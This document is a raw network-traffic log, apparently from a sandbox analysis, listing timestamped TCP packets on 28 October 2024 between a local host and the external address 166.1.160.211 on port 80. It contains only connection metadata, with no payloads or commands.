                                                                                                                                                              Oct 28, 2024 19:46:21.548518896 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.548552990 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.548557997 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.548587084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.548599958 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.548620939 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.548666954 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.548672915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.548726082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.548758030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.548769951 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.548793077 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.548825026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.548836946 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.548861027 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.548893929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.548903942 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.548949957 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.548995972 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.549057007 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.549170971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.549218893 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.549386978 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.549422026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.549467087 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.549472094 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.549504995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.549539089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.549550056 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.549573898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.549618959 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.549624920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.549658060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.549691916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.549706936 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.549731970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.549766064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.549777985 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.549801111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.549844980 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.550179958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.550231934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.550266981 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.550287962 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.550662041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.550697088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.550714970 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.550730944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.550762892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.550780058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.550796032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.550828934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.550843954 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.550863028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.550896883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.550913095 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.550935030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.550987959 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.550993919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.551060915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.551093102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.551117897 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.551129103 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.551162958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.551178932 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.551197052 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.794188023 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.794223070 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.794234991 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.794256926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.794295073 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.794308901 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.794331074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.794373035 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.794534922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.794569016 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.794604063 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.794615030 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.794637918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.794677973 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.794720888 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.794775963 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.794791937 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.794817924 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.794903040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.794919968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.794945955 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.795109987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.795125961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.795144081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.795154095 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.795159101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.795175076 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.795187950 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.795222044 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.795250893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.795267105 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.795283079 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.795308113 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.795679092 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.795695066 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.795716047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.795722008 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.795752048 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.795754910 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.795816898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.795833111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.795857906 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.795979977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.796003103 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.796020031 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.796027899 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.796036005 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.796058893 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.796159029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.796175003 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.796200991 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.796201944 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.796241999 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.796444893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.796504021 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.796519041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.796555996 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.796634912 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.796648979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.796667099 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.796674013 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.796683073 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.796710014 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.796768904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.796812057 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.796890020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.796905994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.796921968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.796936989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.796945095 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.796953917 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.796986103 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.797377110 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.797406912 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.797421932 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.797424078 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.797461033 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.797560930 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.797575951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.797593117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.797610044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.797615051 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.797652960 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.797678947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.797703981 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.797749043 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.797799110 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.797872066 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.797887087 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.797903061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.797918081 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.797944069 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.799562931 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.799612999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.799628973 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.799664021 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.799721956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.799767017 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.871422052 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.876955986 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.876996040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.877032995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.877052069 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.877094030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.877129078 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.877142906 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.877218008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.877250910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.877264023 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.877285957 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.877332926 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.877336025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.877371073 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.877414942 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.877501965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.877536058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.877568960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.877580881 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.877604008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.877649069 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.877669096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.877847910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.877881050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.877903938 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.992659092 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.992672920 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.992693901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.992728949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.992737055 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.992933035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.992965937 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.992975950 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993000984 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993035078 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993042946 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993069887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993103027 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993135929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993138075 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993170977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993182898 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993207932 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993244886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993253946 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993442059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993475914 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993490934 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993510962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993546009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993558884 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993597984 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993642092 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993649960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993686914 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993720055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993732929 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993753910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993788004 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993798971 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993823051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993858099 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993871927 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993907928 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993941069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.993949890 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.993976116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994009972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994020939 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.994231939 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994270086 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994286060 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.994389057 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994421959 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994443893 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.994472980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994508028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994523048 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.994541883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994575977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994592905 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.994610071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994643927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994661093 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.994678020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994710922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994726896 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.994745016 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994777918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994796038 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.994812965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994848013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994863987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.994884014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.994934082 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.995191097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995224953 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995259047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995270967 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.995295048 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995346069 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.995381117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995434046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995469093 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995480061 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.995501995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995537043 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995547056 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.995789051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995822906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995836973 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.995857000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995891094 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995906115 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.995939970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995974064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.995994091 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.996009111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996042967 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996057987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.996078968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996114969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996125937 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.996273994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996310949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996321917 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.996346951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996381044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996398926 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.996695042 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996730089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996752024 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.996763945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996798992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996814013 CET4972680192.168.2.16166.1.160.211
